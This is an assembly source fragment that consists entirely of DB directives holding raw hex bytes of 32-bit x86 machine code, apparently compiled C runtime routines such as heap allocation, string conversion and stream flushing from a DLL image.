DB 033H,0C0H,0B9H,040H,000H,000H,000H,0F3H,0ABH,0AAH,083H,07CH,024H,014H,001H
DB 00FH,086H,010H,001H,000H,000H,08DH,074H,024H,01AH,038H,044H,024H,01AH,074H
DB 02CH,08AH,046H,001H,084H,0C0H,074H,025H,033H,0C9H,033H,0D2H,08AH,00EH,08AH
DB 0D0H,03BH,0D1H,072H,011H,080H,089H,001H,051H,000H,010H,004H,041H,033H,0C0H
DB 08AH,046H,001H,03BH,0C1H,073H,0EFH,083H,0C6H,002H,080H,03EH,000H,075H,0D4H
DB 0B8H,001H,000H,000H,000H,080H,088H,001H,051H,000H,010H,008H,040H,03DH,0FFH
DB 000H,000H,000H,072H,0F1H,055H,089H,02DH,004H,052H,000H,010H,0E8H,07FH,001H
DB 000H,000H,083H,0C4H,004H,0E9H,0B9H,000H,000H,000H,0BFH,000H,051H,000H,010H
DB 033H,0C0H,0B9H,040H,000H,000H,000H,0F3H,0ABH,0AAH,08BH,04CH,024H,010H,08DH
DB 014H,049H,08DH,03CH,055H,000H,000H,000H,000H,08DH,00CH,007H,08DH,034H,0CDH
DB 038H,052H,000H,010H,080H,03EH,000H,074H,031H,08AH,04EH,001H,084H,0C9H,074H
DB 02AH,033H,0D2H,033H,0DBH,08AH,016H,08AH,0D9H,03BH,0DAH,072H,016H,08AH,088H
DB 020H,052H,000H,010H,008H,08AH,001H,051H,000H,010H,042H,033H,0DBH,08AH,05EH
DB 001H,03BH,0DAH,073H,0F0H,083H,0C6H,002H,080H,03EH,000H,075H,0CFH,040H,083H
DB 0F8H,004H,072H,0BAH,055H,089H,02DH,004H,052H,000H,010H,0E8H,008H,001H,000H
DB 000H,083H,0C4H,004H,0BAH,010H,052H,000H,010H,0A3H,008H,052H,000H,010H,08BH
DB 044H,024H,010H,0C1H,0E0H,004H,08BH,09CH,040H,030H,052H,000H,010H,06AH,019H
DB 08DH,08CH,040H,02CH,052H,000H,010H,08BH,001H,08BH,049H,008H,089H,002H,089H
DB 05AH,004H,089H,04AH,008H,0E8H,062H,006H,000H,000H,083H,0C4H,004H,033H,0C0H
DB 05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H,033H,0C0H,0A3H,004H,052H,000H,010H
DB 0B9H,010H,052H,000H,010H,06AH,019H,0A3H,008H,052H,000H,010H,033H,0C0H,089H
DB 001H,089H,041H,004H,089H,041H,008H,0E8H,033H,006H,000H,000H,083H,0C4H,004H
DB 033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H,083H,03DH,01CH,052H,000H
DB 010H,000H,074H,019H,0E8H,0E8H,000H,000H,000H,06AH,019H,0E8H,011H,006H,000H
DB 000H,083H,0C4H,004H,033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H,06AH
DB 019H,0E8H,0FDH,005H,000H,000H,083H,0C4H,004H,0B8H,0FFH,0FFH,0FFH,0FFH,05DH
DB 05FH,05EH,05BH,083H,0C4H,018H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0C7H,005H,01CH,052H,000H,010H,000H,000H,000H,000H
DB 08BH,044H,024H,004H,083H,0F8H,0FEH,075H,010H,0C7H,005H,01CH,052H,000H,010H
DB 001H,000H,000H,000H,0FFH,025H,0B4H,0C1H,000H,010H,083H,0F8H,0FDH,075H,010H
DB 0C7H,005H,01CH,052H,000H,010H,001H,000H,000H,000H,0FFH,025H,0B0H,0C1H,000H
DB 010H,083H,0F8H,0FCH,075H,00FH,0C7H,005H,01CH,052H,000H,010H,001H,000H,000H
DB 000H,0A1H,0D8H,057H,000H,010H,0C3H,0CCH,0CCH,0CCH,08BH,044H,024H,004H,02DH
DB 0A4H,003H,000H,000H,083H,0F8H,012H,077H,00FH,033H,0C9H,08AH,088H,05CH,023H
DB 000H,010H,0FFH,024H,08DH,048H,023H,000H,010H,033H,0C0H,0C3H,0B8H,011H,004H
DB 000H,000H,0C3H,0B8H,004H,008H,000H,000H,0C3H,0B8H,012H,004H,000H,000H,0C3H
DB 0B8H,004H,004H,000H,000H,0C3H,030H,023H,000H,010H,036H,023H,000H,010H,03CH
DB 023H,000H,010H,042H,023H,000H,010H,02DH,023H,000H,010H,000H,004H,004H,004H
DB 001H,004H,004H,004H,004H,004H,004H,004H,004H,004H,004H,004H,004H,002H,003H
DB 0CCH,057H,033H,0C0H,0BFH,000H,051H,000H,010H,0B9H,040H,000H,000H,000H,0F3H
DB 0ABH,0AAH,0A3H,010H,052H,000H,010H,0B9H,010H,052H,000H,010H,05FH,0A3H,004H
DB 052H,000H,010H,0A3H,008H,052H,000H,010H,089H,041H,004H,089H,041H,008H,0C3H
DB 0CCH,0CCH,0CCH,0CCH,06AH,0FDH,0E8H,0E9H,0FCH,0FFH,0FFH,083H,0C4H,004H,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,083H,0ECH,004H,083H,03DH,01CH,053H,000H,010H,000H
DB 053H,056H,057H,055H,075H,040H,08BH,035H,0C4H,0C1H,000H,010H,0FFH,0D6H,08BH
DB 0F8H,085H,0FFH,074H,010H,0C7H,005H,01CH,053H,000H,010H,001H,000H,000H,000H
DB 08BH,05CH,024H,010H,0EBH,030H,0FFH,015H,0BCH,0C1H,000H,010H,08BH,0D8H,085H
DB 0DBH,074H,00CH,0C7H,005H,01CH,053H,000H,010H,002H,000H,000H,000H,0EBH,018H
DB 033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,004H,0C3H,08BH,07CH,024H,010H,08BH
DB 05CH,024H,010H,08BH,035H,0C4H,0C1H,000H,010H,083H,03DH,01CH,053H,000H,010H
DB 001H,00FH,085H,0A2H,000H,000H,000H,085H,0FFH,075H,012H,0FFH,0D6H,08BH,0F8H
DB 085H,0FFH,075H,00AH,033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,004H,0C3H,066H
DB 083H,03FH,000H,08BH,0F7H,074H,012H,083H,0C6H,002H,066H,083H,03EH,000H,075H
DB 0F7H,083H,0C6H,002H,066H,083H,03EH,000H,075H,0EEH,02BH,0F7H,06AH,000H,0C1H
DB 0FEH,001H,06AH,000H,046H,06AH,000H,06AH,000H,056H,057H,06AH,000H,06AH,000H
DB 0FFH,015H,0C8H,0C1H,000H,010H,08BH,0E8H,085H,0EDH,074H,041H,055H,0E8H,0AFH
DB 005H,000H,000H,083H,0C4H,004H,08BH,0D8H,085H,0DBH,074H,032H,06AH,000H,06AH
DB 000H,055H,053H,056H,057H,06AH,000H,06AH,000H,0FFH,015H,0C8H,0C1H,000H,010H
DB 085H,0C0H,075H,00BH,053H,0E8H,06AH,005H,000H,000H,083H,0C4H,004H,033H,0DBH
DB 057H,0FFH,015H,0C0H,0C1H,000H,010H,08BH,0C3H,05DH,05FH,05EH,05BH,083H,0C4H
DB 004H,0C3H,057H,0FFH,015H,0C0H,0C1H,000H,010H,033H,0C0H,05DH,05FH,05EH,05BH
DB 083H,0C4H,004H,0C3H,083H,03DH,01CH,053H,000H,010H,002H,075H,07BH,085H,0DBH
DB 075H,016H,0FFH,015H,0BCH,0C1H,000H,010H,08BH,0D8H,085H,0DBH,075H,00AH,033H
DB 0C0H,05DH,05FH,05EH,05BH,083H,0C4H,004H,0C3H,08BH,0EBH,080H,03BH,000H,074H
DB 00EH,045H,080H,07DH,000H,000H,075H,0F9H,045H,080H,07DH,000H,000H,075H,0F2H
DB 02BH,0EBH,045H,055H,0E8H,022H,005H,000H,000H,089H,044H,024H,014H,083H,0C4H
DB 004H,085H,0C0H,075H,011H,053H,0FFH,015H,0B8H,0C1H,000H,010H,033H,0C0H,05DH
DB 05FH,05EH,05BH,083H,0C4H,004H,0C3H,08BH,07CH,024H,010H,08BH,0F3H,08BH,0CDH
DB 0C1H,0E9H,002H,0F3H,0A5H,08BH,0CDH,053H,083H,0E1H,003H,0F3H,0A4H,0FFH,015H
DB 0B8H,0C1H,000H,010H,08BH,044H,024H,010H,05DH,05FH,05EH,05BH,083H,0C4H,004H
DB 0C3H,033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,004H,0C3H,0CCH,0CCH,0CCH,0CCH
DB 0CCH,08BH,044H,024H,004H,0A3H,070H,050H,000H,010H,0C3H,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0A1H,06CH,050H,000H,010H,083H,0F8H,001H,074H,00DH,085H,0C0H,075H
DB 02EH,083H,03DH,070H,050H,000H,010H,001H,075H,025H,068H,0FCH,000H,000H,000H
DB 0E8H,01FH,000H,000H,000H,083H,0C4H,004H,0A1H,010H,056H,000H,010H,085H,0C0H
DB 074H,002H,0FFH,0D0H,068H,0FFH,000H,000H,000H,0E8H,007H,000H,000H,000H,083H
DB 0C4H,004H,0C3H,0CCH,0CCH,0CCH,081H,0ECH,0A8H,001H,000H,000H,033H,0C0H,0B9H
DB 088H,055H,000H,010H,053H,08BH,094H,024H,0B0H,001H,000H,000H,056H,057H,055H
DB 039H,011H,074H,00CH,083H,0C1H,008H,040H,081H,0F9H,010H,056H,000H,010H,072H
DB 0F0H,039H,014H,0C5H,088H,055H,000H,010H,08DH,01CH,0C5H,000H,000H,000H,000H
DB 00FH,085H,0A7H,001H,000H,000H,083H,03DH,06CH,050H,000H,010H,001H,00FH,084H
DB 05FH,001H,000H,000H,083H,03DH,06CH,050H,000H,010H,000H,075H,00DH,083H,03DH
DB 070H,050H,000H,010H,001H,00FH,084H,049H,001H,000H,000H,081H,0FAH,0FCH,000H
DB 000H,000H,00FH,084H,078H,001H,000H,000H,08DH,084H,024H,0B4H,000H,000H,000H
DB 068H,004H,001H,000H,000H,050H,08BH,02DH,05CH,0C1H,000H,010H,06AH,000H,0FFH
DB 0D5H,085H,0C0H,075H,016H,0BEH,060H,056H,000H,010H,08DH,0BCH,024H,0B4H,000H
DB 000H,000H,0B9H,005H,000H,000H,000H,0F3H,0A5H,066H,0A5H,0A4H,08DH,0ACH,024H
DB 0B4H,000H,000H,000H,08DH,0BCH,024H,0B4H,000H,000H,000H,0B9H,0FFH,0FFH,0FFH
DB 0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H,083H,0F9H,03CH,076H,026H,08DH,0BCH,024H
DB 0B4H,000H,000H,000H,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,06AH,003H,0F2H,0AEH
DB 0F7H,0D1H,08DH,06CH,00CH,07CH,068H,05CH,056H,000H,010H,055H,0E8H,0C3H,004H
DB 000H,000H,083H,0C4H,00CH,0BEH,040H,056H,000H,010H,08DH,07CH,024H,014H,0B9H
DB 006H,000H,000H,000H,0F3H,0A5H,066H,0A5H,08BH,0FDH,0B9H,0FFH,0FFH,0FFH,0FFH
DB 02BH,0C0H,0F2H,0AEH,0F7H,0D1H,02BH,0F9H,08BH,0D1H,08BH,0F7H,0B9H,0FFH,0FFH
DB 0FFH,0FFH,08DH,07CH,024H,014H,02BH,0C0H,0F2H,0AEH,04FH,08BH,0CAH,0C1H,0E9H
DB 002H,0F3H,0A5H,08BH,0CAH,083H,0E1H,003H,0F3H,0A4H,0BFH,03CH,056H,000H,010H
DB 0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H,02BH,0F9H,08BH,0D1H
DB 08BH,0F7H,0B9H,0FFH,0FFH,0FFH,0FFH,08DH,07CH,024H,014H,02BH,0C0H,0F2H,0AEH
DB 04FH,08BH,0CAH,0C1H,0E9H,002H,0F3H,0A5H,08BH,0CAH,083H,0E1H,003H,0F3H,0A4H
DB 08BH,0BBH,08CH,055H,000H,010H,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH
DB 0F7H,0D1H,02BH,0F9H,08BH,0F7H,08BH,0D1H,08DH,07CH,024H,014H,0B9H,0FFH,0FFH
DB 0FFH,0FFH,02BH,0C0H,0F2H,0AEH,04FH,08BH,0CAH,0C1H,0E9H,002H,0F3H,0A5H,08BH
DB 0CAH,068H,010H,020H,001H,000H,083H,0E1H,003H,068H,014H,056H,000H,010H,0F3H
DB 0A4H,08DH,044H,024H,01CH,050H,0E8H,066H,003H,000H,000H,083H,0C4H,00CH,05DH
DB 05FH,05EH,05BH,081H,0C4H,0A8H,001H,000H,000H,0C3H,0A1H,030H,0B4H,000H,010H
DB 08BH,070H,048H,083H,0FEH,0FFH,075H,00AH,06AH,0F4H,0FFH,015H,09CH,0C1H,000H
DB 010H,08BH,0F0H,08BH,093H,08CH,055H,000H,010H,06AH,000H,08DH,044H,024H,014H
DB 08BH,0FAH,050H,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H,049H
DB 051H,052H,056H,0FFH,015H,0CCH,0C1H,000H,010H,05DH,05FH,05EH,05BH,081H,0C4H
DB 0A8H,001H,000H,000H,0C3H,0CCH,0CCH,056H,0A1H,0BCH,056H,000H,010H,050H,08BH
DB 035H,0D0H,0C1H,000H,010H,0FFH,0D6H,08BH,00DH,0ACH,056H,000H,010H,051H,0FFH
DB 0D6H,0A1H,09CH,056H,000H,010H,050H,0FFH,0D6H,0A1H,07CH,056H,000H,010H,050H
DB 0FFH,0D6H,05EH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,053H,056H,057H,08BH,035H
DB 0A4H,0C1H,000H,010H,033H,0FFH,08DH,01CH,0BDH,078H,056H,000H,010H,08BH,003H
DB 085H,0C0H,074H,022H,083H,0FFH,011H,074H,01DH,083H,0FFH,00DH,074H,018H,083H
DB 0FFH,009H,074H,013H,083H,0FFH,001H,074H,00EH,050H,0FFH,0D6H,08BH,003H,050H
DB 0E8H,009H,002H,000H,000H,083H,0C4H,004H,047H,083H,0FFH,030H,07CH,0CBH,0A1H
DB 09CH,056H,000H,010H,050H,0FFH,0D6H,0A1H,0ACH,056H,000H,010H,050H,0FFH,0D6H
DB 0A1H,0BCH,056H,000H,010H,050H,0FFH,0D6H,0A1H,07CH,056H,000H,010H,050H,0FFH
DB 0D6H,05FH,05EH,05BH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,055H,08BH,044H,024H,008H,08BH,0ECH,056H,057H,08DH,03CH,085H,078H
DB 056H,000H,010H,083H,03FH,000H,075H,046H,06AH,018H,0E8H,0D4H,001H,000H,000H
DB 083H,0C4H,004H,08BH,0F0H,085H,0F6H,075H,00AH,06AH,011H,0E8H,024H,0EFH,0FFH
DB 0FFH,083H,0C4H,004H,06AH,011H,0E8H,0CAH,0FFH,0FFH,0FFH,083H,0C4H,004H,083H
DB 03FH,000H,056H,075H,00AH,0FFH,015H,0D0H,0C1H,000H,010H,089H,037H,0EBH,008H
DB 0E8H,082H,001H,000H,000H,083H,0C4H,004H,06AH,011H,0E8H,018H,000H,000H,000H
DB 083H,0C4H,004H,08BH,007H,050H,0FFH,015H,0D4H,0C1H,000H,010H,05FH,05EH,05DH
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,055H,08BH,044H,024H,008H,08BH
DB 0ECH,08BH,00CH,085H,078H,056H,000H,010H,051H,0FFH,015H,0D8H,0C1H,000H,010H
DB 05DH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,055H,08BH,044H,024H
DB 008H,08BH,0ECH,03DH,028H,058H,000H,010H,072H,01CH,03DH,088H,05AH,000H,010H
DB 077H,015H,02DH,028H,058H,000H,010H,0C1H,0F8H,005H,083H,0C0H,01CH,050H,0E8H
DB 04AH,0FFH,0FFH,0FFH,08BH,0E5H,05DH,0C3H,083H,0C0H,020H,050H,0FFH,015H,0D4H
DB 0C1H,000H,010H,05DH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 055H,08BH,044H,024H,008H,08BH,0ECH,083H,0F8H,014H,07DH,00DH,083H,0C0H,01CH
DB 050H,0E8H,01BH,0FFH,0FFH,0FFH,08BH,0E5H,05DH,0C3H,08BH,045H,00CH,083H,0C0H
DB 020H,050H,0FFH,015H,0D4H,0C1H,000H,010H,05DH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,055H,08BH,044H,024H,008H,08BH,0ECH,03DH,028H,058H,000H,010H
DB 072H,01CH,03DH,088H,05AH,000H,010H,077H,015H,02DH,028H,058H,000H,010H,0C1H
DB 0F8H,005H,083H,0C0H,01CH,050H,0E8H,04AH,0FFH,0FFH,0FFH,08BH,0E5H,05DH,0C3H
DB 083H,0C0H,020H,050H,0FFH,015H,0D8H,0C1H,000H,010H,05DH,0C3H,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,055H,08BH,044H,024H,008H,08BH,0ECH,083H
DB 0F8H,014H,07DH,00DH,083H,0C0H,01CH,050H,0E8H,01BH,0FFH,0FFH,0FFH,08BH,0E5H
DB 05DH,0C3H,08BH,045H,00CH,083H,0C0H,020H,050H,0FFH,015H,0D8H,0C1H,000H,010H
DB 05DH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,056H,057H,08BH,07CH,024H
DB 010H,00FH,0AFH,07CH,024H,00CH,085H,0FFH,075H,005H,0BFH,001H,000H,000H,000H
DB 08BH,035H,0DCH,0C1H,000H,010H,0A1H,030H,0B5H,000H,010H,083H,0FFH,0E0H,076H
DB 004H,033H,0C0H,0EBH,006H,057H,06AH,008H,050H,0FFH,0D6H,085H,0C0H,075H,01DH
DB 083H,03DH,0ACH,05AH,000H,010H,000H,074H,014H,057H,0E8H,07FH,002H,000H,000H
DB 083H,0C4H,004H,085H,0C0H,0A1H,030H,0B5H,000H,010H,075H,0D2H,033H,0C0H,05FH
DB 05EH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,08BH,044H,024H,004H,085H,0C0H,074H,00FH,050H,06AH,000H,0A1H,030H,0B5H
DB 000H,010H,050H,0FFH,015H,0E0H,0C1H,000H,010H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0A1H,0ACH,05AH,000H,010H,08BH,04CH,024H,004H,050H,051H,0E8H
DB 010H,000H,000H,000H,083H,0C4H,008H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,056H,057H,08BH,07CH,024H,00CH,083H,0FFH,0E0H,076H
DB 005H,033H,0C0H,05FH,05EH,0C3H,085H,0FFH,075H,005H,0BFH,001H,000H,000H,000H
DB 08BH,074H,024H,010H,057H,0E8H,01DH,000H,000H,000H,083H,0C4H,004H,085H,0C0H
DB 075H,013H,085H,0F6H,074H,00FH,057H,0E8H,0ECH,001H,000H,000H,083H,0C4H,004H
DB 085H,0C0H,075H,0E2H,033H,0C0H,05FH,05EH,0C3H,08BH,044H,024H,004H,08BH,00DH
DB 030H,0B5H,000H,010H,050H,06AH,000H,051H,0FFH,015H,0DCH,0C1H,000H,010H,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,053H,056H,057H,033H
DB 0F6H,039H,035H,0DCH,057H,000H,010H,075H,042H,068H,018H,058H,000H,010H,0FFH
DB 015H,0E4H,0C1H,000H,010H,08BH,0F8H,085H,0FFH,074H,06EH,068H,00CH,058H,000H
DB 010H,08BH,01DH,064H,0C1H,000H,010H,057H,0FFH,0D3H,0A3H,0DCH,057H,000H,010H
DB 085H,0C0H,074H,057H,068H,0FCH,057H,000H,010H,057H,0FFH,0D3H,068H,0E8H,057H
DB 000H,010H,0A3H,0E0H,057H,000H,010H,057H,0FFH,0D3H,0A3H,0E4H,057H,000H,010H
DB 0A1H,0E0H,057H,000H,010H,085H,0C0H,074H,004H,0FFH,0D0H,08BH,0F0H,085H,0F6H
DB 074H,012H,083H,03DH,0E4H,057H,000H,010H,000H,074H,009H,056H,0FFH,015H,0E4H
DB 057H,000H,010H,08BH,0F0H,08BH,044H,024H,018H,08BH,04CH,024H,014H,08BH,054H
DB 024H,010H,050H,051H,052H,056H,0FFH,015H,0DCH,057H,000H,010H,05FH,05EH,05BH
DB 0C3H,033H,0C0H,05FH,05EH,05BH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,055H,08BH,0ECH,057H,056H,08BH,07DH,008H,08BH
DB 075H,00CH,08BH,0D7H,08BH,04DH,010H,0E3H,00CH,0ACH,00AH,0C0H,074H,003H,0AAH
DB 0E2H,0F8H,032H,0C0H,0F3H,0AAH,08BH,0C2H,05EH,05FH,0C9H,0C3H,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,083H,03DH,018H,0A4H,000H,010H
DB 000H,056H,075H,00CH,0C7H,005H,018H,0A4H,000H,010H,000H,002H,000H,000H,0EBH
DB 013H,083H,03DH,018H,0A4H,000H,010H,014H,07DH,00AH,0C7H,005H,018H,0A4H,000H
DB 010H,014H,000H,000H,000H,06AH,004H,0A1H,018H,0A4H,000H,010H,050H,0E8H,0FAH
DB 0FDH,0FFH,0FFH,083H,0C4H,008H,0A3H,01CH,0A4H,000H,010H,085H,0C0H,075H,029H
DB 0C7H,005H,018H,0A4H,000H,010H,014H,000H,000H,000H,06AH,004H,06AH,014H,0E8H
DB 0DBH,0FDH,0FFH,0FFH,083H,0C4H,008H,0A3H,01CH,0A4H,000H,010H,085H,0C0H,075H
DB 00AH,06AH,01AH,0E8H,0A8H,0EBH,0FFH,0FFH,083H,0C4H,004H,0B9H,028H,058H,000H
DB 010H,033H,0C0H,08BH,015H,01CH,0A4H,000H,010H,083H,0C0H,004H,089H,04CH,002H
DB 0FCH,083H,0C1H,020H,083H,0F8H,050H,07CH,0EBH,033H,0D2H,0BEH,038H,058H,000H
DB 010H,08BH,0C2H,08BH,0CAH,083H,0E0H,0E7H,083H,0E1H,01FH,0C1H,0F8H,003H,0C1H
DB 0E1H,002H,08BH,080H,030H,0B4H,000H,010H,08DH,00CH,0C9H,08BH,004H,008H,083H
DB 0F8H,0FFH,074H,004H,085H,0C0H,075H,006H,0C7H,006H,0FFH,0FFH,0FFH,0FFH,083H
DB 0C6H,020H,042H,081H,0FEH,098H,058H,000H,010H,072H,0C9H,05EH,0C3H,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0E8H,0ABH,001H,000H,000H,080H,03DH,0C4H
DB 050H,000H,010H,000H,074H,005H,0E9H,04DH,000H,000H,000H,0C3H,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,06AH,009H,0E8H,0C9H,0FBH,0FFH
DB 0FFH,083H,0C4H,004H,0A1H,028H,060H,000H,010H,085H,0C0H,074H,01EH,08BH,04CH
DB 024H,004H,051H,0FFH,0D0H,083H,0C4H,004H,085H,0C0H,074H,010H,06AH,009H,0E8H
DB 018H,0FCH,0FFH,0FFH,083H,0C4H,004H,0B8H,001H,000H,000H,000H,0C3H,06AH,009H
DB 0E8H,008H,0FCH,0FFH,0FFH,083H,0C4H,004H,033H,0C0H,0C3H,0CCH,0CCH,053H,056H
DB 057H,033H,0F6H,055H,0BFH,003H,000H,000H,000H,06AH,002H,0E8H,07EH,0FBH,0FFH
DB 0FFH,083H,0C4H,004H,039H,03DH,018H,0A4H,000H,010H,07EH,06AH,0BDH,00CH,000H
DB 000H,000H,08BH,01DH,0A4H,0C1H,000H,010H,0A1H,01CH,0A4H,000H,010H,08BH,004H
DB 028H,085H,0C0H,074H,047H,0F6H,040H,00CH,083H,074H,00FH,050H,0E8H,0E0H,001H
DB 000H,000H,083H,0C4H,004H,083H,0F8H,0FFH,074H,001H,046H,083H,0FDH,050H,07CH
DB 02DH,0A1H,01CH,0A4H,000H,010H,08BH,004H,028H,083H,0C0H,020H,050H,0FFH,0D3H
DB 08BH,00DH,01CH,0A4H,000H,010H,08BH,014H,029H,052H,0E8H,0F5H,0FCH,0FFH,0FFH
DB 083H,0C4H,004H,08BH,00DH,01CH,0A4H,000H,010H,0C7H,004H,029H,000H,000H,000H
DB 000H,083H,0C5H,004H,047H,03BH,03DH,018H,0A4H,000H,010H,07CH,0A1H,06AH,002H
DB 0E8H,072H,0FBH,0FFH,0FFH,083H,0C4H,004H,08BH,0C6H,05DH,05FH,05EH,05BH,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,056H,08BH,074H,024H,008H,056H,0E8H
DB 035H,000H,000H,000H,083H,0C4H,004H,085H,0C0H,074H,007H,0B8H,0FFH,0FFH,0FFH
DB 0FFH,05EH,0C3H,0F6H,046H,00DH,040H,074H,019H,08BH,046H,010H,050H,0E8H,0F8H
DB 001H,000H,000H,083H,0C4H,004H,083H,0F8H,001H,0B8H,000H,000H,000H,000H,05EH
DB 083H,0D0H,0FFH,0C3H,033H,0C0H,05EH,0C3H,0CCH,0CCH,0CCH,0CCH,053H,056H,08BH
DB 074H,024H,00CH,057H,033H,0FFH,08BH,046H,00CH,08BH,0C8H,080H,0E1H,003H,080H
DB 0F9H,002H,075H,03CH,0A9H,008H,001H,000H,000H,074H,035H,08BH,046H,008H,08BH
DB 01EH,02BH,0D8H,085H,0DBH,07EH,02AH,053H,050H,08BH,046H,010H,050H,0E8H,05DH
DB 002H,000H,000H,083H,0C4H,00CH,03BH,0C3H,075H,00FH,08BH,046H,00CH,0A8H,080H
DB 074H,011H,083H,0E0H,0FDH,089H,046H,00CH,0EBH,009H,083H,04EH,00CH,020H,0BFH
DB 0FFH,0FFH,0FFH,0FFH,08BH,046H,008H,089H,006H,08BH,0C7H,0C7H,046H,004H,000H
DB 000H,000H,000H,05FH,05EH,05BH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,06AH,001H,0E8H,009H,000H,000H,000H,083H,0C4H,004H,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,083H,0ECH,004H,053H,056H,057H,055H,033H,0FFH,06AH
DB 002H,033H,0F6H,033H,0DBH,089H,07CH,024H,014H,0E8H,018H,0FAH,0FFH,0FFH,08BH
DB 06CH,024H,01CH,083H,0C4H,004H,0A1H,01CH,0A4H,000H,010H,08BH,004H,018H,085H
DB 0C0H,074H,065H,0F6H,040H,00CH,083H,074H,05FH,050H,056H,0E8H,0C8H,0FAH,0FFH
DB 0FFH,083H,0C4H,008H,0A1H,01CH,0A4H,000H,010H,08BH,00CH,018H,08BH,041H,00CH
DB 0A8H,083H,074H,034H,083H,0FDH,001H,075H,011H,051H,0E8H,0EBH,0FEH,0FFH,0FFH
DB 083H,0C4H,004H,083H,0F8H,0FFH,074H,021H,047H,0EBH,01EH,085H,0EDH,075H,01AH
DB 0A8H,002H,074H,016H,051H,0E8H,0D2H,0FEH,0FFH,0FFH,083H,0C4H,004H,083H,0F8H
DB 0FFH,075H,008H,0C7H,044H,024H,010H,0FFH,0FFH,0FFH,0FFH,0A1H,01CH,0A4H,000H
DB 010H,08BH,00CH,018H,051H,056H,0E8H,0E3H,0FAH,0FFH,0FFH,083H,0C4H,008H,083H
DB 0C3H,004H,046H,081H,0FBH,000H,008H,000H,000H,07CH,083H,06AH,002H,0E8H,0FDH
DB 0F9H,0FFH,0FFH,083H,0C4H,004H,08BH,0C7H,083H,0FDH,001H,074H,004H,08BH,044H
DB 024H,010H,05DH,05FH,05EH,05BH,083H,0C4H,004H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,056H,057H,0BFH,0FFH,0FFH,0FFH,0FFH,08BH,074H,024H,00CH,0F6H,046H
DB 00CH,040H,074H,00CH,0C7H,046H,00CH,000H,000H,000H,000H,08BH,0C7H,05FH,05EH
DB 0C3H,056H,0E8H,0DDH,0F9H,0FFH,0FFH,083H,0C4H,004H,056H,0E8H,014H,000H,000H
DB 000H,083H,0C4H,004H,08BH,0F8H,056H,0E8H,039H,0FAH,0FFH,0FFH,083H,0C4H,004H
DB 08BH,0C7H,05FH,05EH,0C3H,0CCH,056H,057H,0BFH,0FFH,0FFH,0FFH,0FFH,08BH,074H
DB 024H,00CH,0F6H,046H,00CH,083H,074H,042H,056H,0E8H,069H,0FEH,0FFH,0FFH,083H
DB 0C4H,004H,08BH,0F8H,056H,0E8H,0AEH,004H,000H,000H,083H,0C4H,004H,08BH,046H
DB 010H,050H,0E8H,0A2H,003H,000H,000H,083H,0C4H,004H,085H,0C0H,07DH,007H,0BFH
DB 0FFH,0FFH,0FFH,0FFH,0EBH,017H,08BH,046H,01CH,085H,0C0H,074H,010H,050H,0E8H
DB 0B7H,0FAH,0FFH,0FFH,0C7H,046H,01CH,000H,000H,000H,000H,083H,0C4H,004H,0C7H
DB 046H,00CH,000H,000H,000H,000H,08BH,0C7H,05FH,05EH,0C3H,0CCH,053H,056H,08BH
DB 074H,024H,00CH,057H,039H,035H,020H,0B4H,000H,010H,076H,07FH,08BH,0C6H,083H
DB 0E0H,0E7H,0C1H,0F8H,003H,08DH,098H,030H,0B4H,000H,010H,08BH,0C6H,083H,0E0H
DB 01FH,08BH,00BH,0C1H,0E0H,002H,08DH,03CH,0C0H,0F6H,044H,039H,004H,001H,074H
DB 05DH,056H,0E8H,009H,006H,000H,000H,083H,0C4H,004H,08BH,003H,0F6H,044H,038H
